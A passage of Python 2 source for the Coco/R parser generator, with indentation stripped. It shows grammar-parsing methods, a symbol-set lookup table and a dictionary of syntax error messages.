self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.greater_Sym)
if self.token.pos > beg:
sym.attrPos = Position( self.scanner.buffer, beg, self.token.pos - beg, col )
else:
self.SynErr(57)
elif self.la.kind == Scanner.lesspoint_Sym:
self.Get( )
if self.la.kind == Scanner.uparrow_Sym or self.la.kind == Scanner.out_Sym:
if self.la.kind == Scanner.uparrow_Sym:
self.Get( )
elif self.la.kind == Scanner.out_Sym:
self.Get( )
else:
self.SynErr(58)
self.Expect(Scanner.ident_Sym)
sym.retVar = self.token.val
if self.la.kind == Scanner.pointgreater_Sym:
self.Get( )
elif self.la.kind == Scanner.comma_Sym:
self.Get( )
beg = self.la.pos
col = self.la.col
while self.StartOf(13):
if self.StartOf(14):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.pointgreater_Sym)
if self.token.pos > beg:
sym.attrPos = Position( self.scanner.buffer, beg, self.token.pos - beg, col )
else:
self.SynErr(59)
elif self.StartOf(10):
beg = self.la.pos
col = self.la.col
while self.StartOf(15):
if self.StartOf(16):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.pointgreater_Sym)
if self.token.pos > beg:
sym.attrPos = Position( self.scanner.buffer, beg, self.token.pos - beg, col )
else:
self.SynErr(60)
else:
self.SynErr(61)
def SemText( self ):
self.Expect(Scanner.lparenpoint_Sym)
beg = self.la.pos
col = self.la.col
while self.StartOf(17):
if self.StartOf(18):
self.Get()
elif self.la.kind == Scanner.badString_Sym:
self.Get( )
self.SemErr( "bad string in semantic action" )
else:
self.Get( )
self.SemErr( "missing end of previous semantic action")
self.Expect(Scanner.pointrparen_Sym)
pos = Position(self.scanner.buffer, beg, self.token.pos - beg, col)
return pos
def Expression( self ):
g = self.Term()
first = True
while self.WeakSeparator(Scanner.bar_Sym, 19, 20):
g2 = self.Term()
if first:
Graph.MakeFirstAlt(g)
first = False
Graph.MakeAlternative(g, g2)
return g
def SimSet( self ):
n1 = 0
n2 = 0
name = ''
s = set( )
mx = CharClass.charSetSize
if self.la.kind == Scanner.ident_Sym:
self.Get( )
c = CharClass.Find(self.token.val)
if c is None:
self.SemErr("undefined name")
else:
s |= c.set
elif self.la.kind == Scanner.string_Sym:
name = self.String()
if self.StartOf(21):
for i in xrange( 0, len(name) ):
if DFA.ignoreCase:
s.add(ord(name[i].lower()))
else:
s.add(ord(name[i]))
elif self.la.kind == Scanner.pointpoint_Sym:
if (len(name) != 1) or (ord(name[0]) > mx-1):
self.SemErr("unacceptable character value")
else:
n1 = ord(name[0]) % mx
if DFA.ignoreCase and (n1 >= ord('A')) and (n1 <= ord('Z')):
n1 += 32
self.Get( )
if self.la.kind == Scanner.string_Sym:
name = self.String()
if (len(name) != 1) or (ord(name[0]) > mx-1):
self.SemErr("unacceptable character value")
else:
n2 = ord(name[0]) % mx
if DFA.ignoreCase and ((n2 >= ord('A')) and (n2 <= ord('Z'))):
n2 += 32
elif self.la.kind == Scanner.CHR_Sym:
n2 = self.SingleChar(mx)
else:
self.SynErr(62)
for i in xrange( n1, n2+1 ):
s.add(i)
else:
self.SynErr(63)
elif self.la.kind == Scanner.CHR_Sym:
n1 = self.SingleChar(mx)
s.add(n1)
if (self.la.kind == Scanner.pointpoint_Sym):
self.Get( )
if self.la.kind == Scanner.string_Sym:
name = self.String()
if (len(name) != 1) or (ord(name[0]) > mx-1):
self.SemErr("unacceptable character value")
else:
n2 = ord(name[0]) % mx
if DFA.ignoreCase and ((n2 >= ord('A')) and (n2 <= ord('Z'))):
n2 += 32
elif self.la.kind == Scanner.CHR_Sym:
n2 = self.SingleChar(mx)
else:
self.SynErr(64)
for i in xrange( n1, n2+1 ):
s.add(i)
elif self.la.kind == Scanner.ANY_Sym:
self.Get( )
s = set( )
for num in xrange( 0, CharClass.charSetSize ):
s.add(num)
s.add('ANYCHAR')
else:
self.SynErr(65)
return s
def String( self ):
self.Expect(Scanner.string_Sym)
name = self.token.val
name = DFA.Unescape( name[ 1 : -1 ] )
return name
def SingleChar( self, mx ):
n = 0
self.Expect(Scanner.CHR_Sym)
self.Expect(Scanner.lparen_Sym)
self.Expect(Scanner.number_Sym)
n = int( self.token.val )
if n > (mx - 1):
self.SemErr("unacceptable character value")
if DFA.ignoreCase and ((n >= ord('A')) and (n <= ord('Z'))):
n += 32
n %= mx
self.Expect(Scanner.rparen_Sym)
return n
def Sym( self ):
name = "???"
kind = self.id
if self.la.kind == Scanner.ident_Sym:
self.Get( )
kind = self.id
name = self.token.val
elif self.la.kind == Scanner.string_Sym:
self.Get( )
kind = self.str
name = "\"" + self.token.val[ 1 : -1 ] + "\""
if DFA.ignoreCase:
name = name.lower()
if name.find(' ') >= 0:
self.SemErr("literal tokens must not contain blanks")
else:
self.SynErr(66)
s = name, kind
return s
def Term( self ):
rslv = None
g = None
if self.StartOf(22):
if (self.la.kind == Scanner.IF_Sym):
rslv = Node(Node.rslv, None, self.la.line)
rslv.pos = self.Resolver()
g = Graph(rslv)
g2 = self.Factor()
if rslv is not None:
Graph.MakeSequence(g, g2)
else:
g = g2
while self.StartOf(23):
g2 = self.Factor()
Graph.MakeSequence(g, g2)
elif self.StartOf(24):
g = Graph(Node(Node.eps, None, 0))
else:
self.SynErr(67)
if g is None: # invalid start of Term
g = Graph(Node(Node.eps, None, 0))
return g
def Resolver( self ):
self.Expect(Scanner.IF_Sym)
self.Expect(Scanner.lparen_Sym)
beg = self.la.pos
col = self.la.col
self.Condition()
pos = Position(self.scanner.buffer, beg, self.token.pos - beg, col)
return pos
def Factor( self ):
weak = False
g = None
if self.la.kind == Scanner.ident_Sym or self.la.kind == Scanner.string_Sym or self.la.kind == Scanner.WEAK_Sym:
if (self.la.kind == Scanner.WEAK_Sym):
self.Get( )
weak = True
s = self.Sym()
name,kind = s
sym = Symbol.Find(name)
if (sym is None) and (kind == self.str):
sym = Tab.literals.get(name)
undef = (sym is None)
if undef:
if kind == self.id:
sym = Symbol(Node.nt, name, 0) # forward nt
elif self.genScanner:
sym = Symbol(Node.t, name, self.token.line)
DFA.MatchLiteral(sym.name, sym)
else: # undefined string in production
self.SemErr("undefined string in production")
sym = Tab.eofSy # dummy
typ = sym.typ
if (typ != Node.t) and (typ != Node.nt):
self.SemErr("this symbol kind is not allowed in a production")
if weak:
if typ == Node.t:
typ = Node.wt
else:
self.SemErr("only terminals may be weak")
p = Node(typ, sym, self.token.line)
g = Graph(p)
if (self.la.kind == Scanner.less_Sym or self.la.kind == Scanner.lesspoint_Sym):
self.Attribs(p)
if kind != self.id:
self.SemErr("a literal must not have attributes")
if undef:
sym.attrPos = p.pos # dummy
sym.retVar = p.retVar # AH - dummy
elif ((p.pos is None) != (sym.attrPos is None)) or ((p.retVar is None) != (sym.retVar is None)):
self.SemErr("attribute mismatch between declaration and use of this symbol")
elif self.la.kind == Scanner.lparen_Sym:
self.Get( )
g = self.Expression()
self.Expect(Scanner.rparen_Sym)
elif self.la.kind == Scanner.lbrack_Sym:
self.Get( )
g = self.Expression()
self.Expect(Scanner.rbrack_Sym)
Graph.MakeOption(g)
elif self.la.kind == Scanner.lbrace_Sym:
self.Get( )
g = self.Expression()
self.Expect(Scanner.rbrace_Sym)
Graph.MakeIteration(g)
elif self.la.kind == Scanner.lparenpoint_Sym:
pos = self.SemText()
p = Node(Node.sem, None, 0)
p.pos = pos
g = Graph(p)
elif self.la.kind == Scanner.ANY_Sym:
self.Get( )
p = Node(Node.any, None, 0) # p.set is set in Tab.SetupAnys
g = Graph(p)
elif self.la.kind == Scanner.SYNC_Sym:
self.Get( )
p = Node(Node.sync, None, 0)
g = Graph(p)
else:
self.SynErr(68)
if g is None: # invalid start of Factor
g = Graph(Node(Node.eps, None, 0))
return g
def Attribs( self, n ):
if self.la.kind == Scanner.less_Sym:
self.Get( )
if self.la.kind == Scanner.uparrow_Sym or self.la.kind == Scanner.out_Sym:
if self.la.kind == Scanner.uparrow_Sym:
self.Get( )
elif self.la.kind == Scanner.out_Sym:
self.Get( )
else:
self.SynErr(69)
beg = self.la.pos
while self.StartOf(25):
if self.StartOf(26):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
n.retVar = self.scanner.buffer.getString(beg, self.la.pos)
if self.la.kind == Scanner.greater_Sym:
self.Get( )
elif self.la.kind == Scanner.comma_Sym:
self.Get( )
beg = self.la.pos
col = self.la.col
while self.StartOf(8):
if self.StartOf(9):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.greater_Sym)
if self.token.pos > beg:
n.pos = Position(self.scanner.buffer, beg, self.token.pos - beg, col)
else:
self.SynErr(70)
elif self.StartOf(10):
beg = self.la.pos
col = self.la.col
while self.StartOf(11):
if self.StartOf(12):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.greater_Sym)
if self.token.pos > beg:
n.pos = Position(self.scanner.buffer, beg, self.token.pos - beg, col)
else:
self.SynErr(71)
elif self.la.kind == Scanner.lesspoint_Sym:
self.Get( )
if self.la.kind == Scanner.uparrow_Sym or self.la.kind == Scanner.out_Sym:
if self.la.kind == Scanner.uparrow_Sym:
self.Get( )
elif self.la.kind == Scanner.out_Sym:
self.Get( )
else:
self.SynErr(72)
beg = self.la.pos
while self.StartOf(27):
if self.StartOf(28):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
n.retVar = self.scanner.buffer.getString(beg, self.la.pos)
if self.la.kind == Scanner.pointgreater_Sym:
self.Get( )
elif self.la.kind == Scanner.comma_Sym:
self.Get( )
beg = self.la.pos
col = self.la.col
while self.StartOf(13):
if self.StartOf(14):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.pointgreater_Sym)
if self.token.pos > beg:
n.pos = Position(self.scanner.buffer, beg, self.token.pos - beg, col)
else:
self.SynErr(73)
elif self.StartOf(10):
beg = self.la.pos
col = self.la.col
while self.StartOf(15):
if self.StartOf(16):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.pointgreater_Sym)
if self.token.pos > beg:
n.pos = Position(self.scanner.buffer, beg, self.token.pos - beg, col)
else:
self.SynErr(74)
else:
self.SynErr(75)
def Condition( self ):
while self.StartOf(29):
if self.la.kind == Scanner.lparen_Sym:
self.Get( )
self.Condition()
else:
self.Get()
self.Expect(Scanner.rparen_Sym)
def TokenTerm( self ):
g = self.TokenFactor()
while self.StartOf(6):
g2 = self.TokenFactor()
Graph.MakeSequence(g, g2)
if (self.la.kind == Scanner.CONTEXT_Sym):
self.Get( )
self.Expect(Scanner.lparen_Sym)
g2 = self.TokenExpr()
Graph.SetContextTrans(g2.l)
Graph.MakeSequence(g, g2)
self.Expect(Scanner.rparen_Sym)
return g
def TokenFactor( self ):
g = None
if self.la.kind == Scanner.ident_Sym or self.la.kind == Scanner.string_Sym:
s = self.Sym()
name,kind = s
if kind == self.id:
c = CharClass.Find(name)
if c is None:
self.SemErr("undefined name")
c = CharClass(name, set( ) )
p = Node(Node.clas, None, 0)
p.val = c.n
g = Graph(p)
self.tokenString = self.noString
else: # str
g = Graph.StrToGraph(name)
if self.tokenString is None:
self.tokenString = name
else:
self.tokenString = self.noString
elif self.la.kind == Scanner.lparen_Sym:
self.Get( )
g = self.TokenExpr()
self.Expect(Scanner.rparen_Sym)
elif self.la.kind == Scanner.lbrack_Sym:
self.Get( )
g = self.TokenExpr()
self.Expect(Scanner.rbrack_Sym)
Graph.MakeOption(g)
elif self.la.kind == Scanner.lbrace_Sym:
self.Get( )
g = self.TokenExpr()
self.Expect(Scanner.rbrace_Sym)
Graph.MakeIteration(g)
else:
self.SynErr(76)
if g is None: # invalid start of TokenFactor
g = Graph(Node(Node.eps, None, 0))
return g
def Parse( self, scanner ):
self.scanner = scanner
self.la = Token( )
self.la.val = u''
self.Get( )
self.Coco()
self.Expect(Scanner.EOF_SYM)
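# Usage sketch (assumption: the Scanner constructor takes the grammar file
# name, as in the CocoRPy27 driver script):
#   scanner = Scanner( 'MyGrammar.atg' )
#   parser = Parser( )
#   parser.Parse( scanner )
#   ok = parser.Successful( )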
set = [
[T,T,x,T, x,x,x,x, x,T,T,T, x,x,x,T, T,T,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, x,x,x,x, x,x],
[x,T,T,T, T,T,x,x, x,x,x,x, T,T,T,x, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[T,T,x,T, x,x,x,x, x,T,T,T, x,x,x,T, T,T,T,x, x,x,x,T, x,T,x,x, x,x,x,x, x,x,T,T, T,x,T,x, T,T,x,T, x,x,x,x, x,x],
[T,T,x,T, x,x,x,x, x,T,T,T, x,x,x,T, T,T,x,T, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, x,x,x,x, x,x],
[T,T,x,T, x,x,x,x, x,T,T,T, x,x,x,T, T,T,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, x,x,x,x, x,x],
[x,T,x,T, x,x,x,x, x,T,T,T, x,x,x,T, T,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, x,x,x,x, x,x],
[x,T,x,T, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,T,x,x, x,x,x,x, x,x,x,x, T,x,T,x, x,x,x,x, x,x,x,x, x,x],
[x,x,x,x, x,x,x,x, x,x,x,T, x,T,T,T, T,x,T,x, x,x,x,x, x,x,T,x, x,x,x,x, x,x,x,x, x,T,x,T, x,x,x,x, x,x,x,x, x,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,x,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,x,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, x,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, x,x,x,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, x,x,x,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, x,x,T,T, T,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, x,x,T,T, T,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, x,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,x, x,T,T,T, T,x],
[x,T,x,T, x,x,x,x, x,x,x,x, x,x,x,x, x,x,T,x, x,x,x,T, x,T,T,x, x,x,x,x, x,x,T,T, T,T,T,T, T,T,x,T, x,x,x,x, x,x],
[x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,T,x, x,x,x,x, x,x,T,x, x,x,x,x, x,x,x,x, x,T,x,T, x,x,x,x, x,x,x,x, x,x],
[x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, T,x,T,x, T,T,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x],
[x,T,x,T, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, x,T,x,x, x,x,x,x, x,x,x,T, T,x,T,x, T,T,x,T, x,x,x,x, x,x],
[x,T,x,T, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,T, x,T,x,x, x,x,x,x, x,x,x,T, T,x,T,x, T,x,x,T, x,x,x,x, x,x],
[x,x,x,x, x,x,x,x, x,x,x,x, x,x,x,x, x,x,T,x, x,x,x,x, x,x,T,x, x,x,x,x, x,x,T,x, x,T,x,T, x,x,x,x, x,x,x,x, x,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,x,x, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,x,x, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,x, T,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,x, T,x,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x],
[x,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,x,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,T,T,T, T,x]
]
errorMessages = {
0 : "EOF expected",
1 : "ident expected",
2 : "number expected",
3 : "string expected",
4 : "badString expected",
5 : "\"COMPILER\" expected",
6 : "\"IGNORECASE\" expected",
7 : "\"CHARACTERS\" expected",
8 : "\"TOKENS\" expected",
9 : "\"NAMES\" expected",
10 : "\"PRAGMAS\" expected",
11 : "\"COMMENTS\" expected",
12 : "\"FROM\" expected",
13 : "\"TO\" expected",
14 : "\"NESTED\" expected",
15 : "\"IGNORE\" expected",
16 : "\"PRODUCTIONS\" expected",
17 : "\"=\" expected",
18 : "\".\" expected",
19 : "\"END\" expected",
20 : "\"+\" expected",
21 : "\"-\" expected",
22 : "\"..\" expected",
23 : "\"ANY\" expected",
24 : "\"CHR\" expected",
25 : "\"(\" expected",
26 : "\")\" expected",
27 : "\"<\" expected",
28 : "\"^\" expected",
29 : "\"out\" expected",
30 : "\">\" expected",
31 : "\",\" expected",
32 : "\"<.\" expected",
33 : "\".>\" expected",
34 : "\"|\" expected",
35 : "\"WEAK\" expected",
36 : "\"[\" expected",
37 : "\"]\" expected",
38 : "\"{\" expected",
39 : "\"}\" expected",
40 : "\"SYNC\" expected",
41 : "\"IF\" expected",
42 : "\"CONTEXT\" expected",
43 : "\"(.\" expected",
44 : "\".)\" expected",
45 : "\"from\" expected",
46 : "\"import\" expected",
47 : "\"*\" expected",
48 : "??? expected",
49 : "this symbol not expected in Coco",
50 : "invalid Imports",
51 : "invalid Imports",
52 : "this symbol not expected in TokenDecl",
53 : "invalid TokenDecl",
54 : "invalid NameDecl",
55 : "invalid AttrDecl",
56 : "invalid AttrDecl",
57 : "invalid AttrDecl",
58 : "invalid AttrDecl",
59 : "invalid AttrDecl",
60 : "invalid AttrDecl",
61 : "invalid AttrDecl",
62 : "invalid SimSet",
63 : "invalid SimSet",
64 : "invalid SimSet",
65 : "invalid SimSet",
66 : "invalid Sym",
67 : "invalid Term",
68 : "invalid Factor",
69 : "invalid Attribs",
70 : "invalid Attribs",
71 : "invalid Attribs",
72 : "invalid Attribs",
73 : "invalid Attribs",
74 : "invalid Attribs",
75 : "invalid Attribs",
76 : "invalid TokenFactor",
} | PypiClean |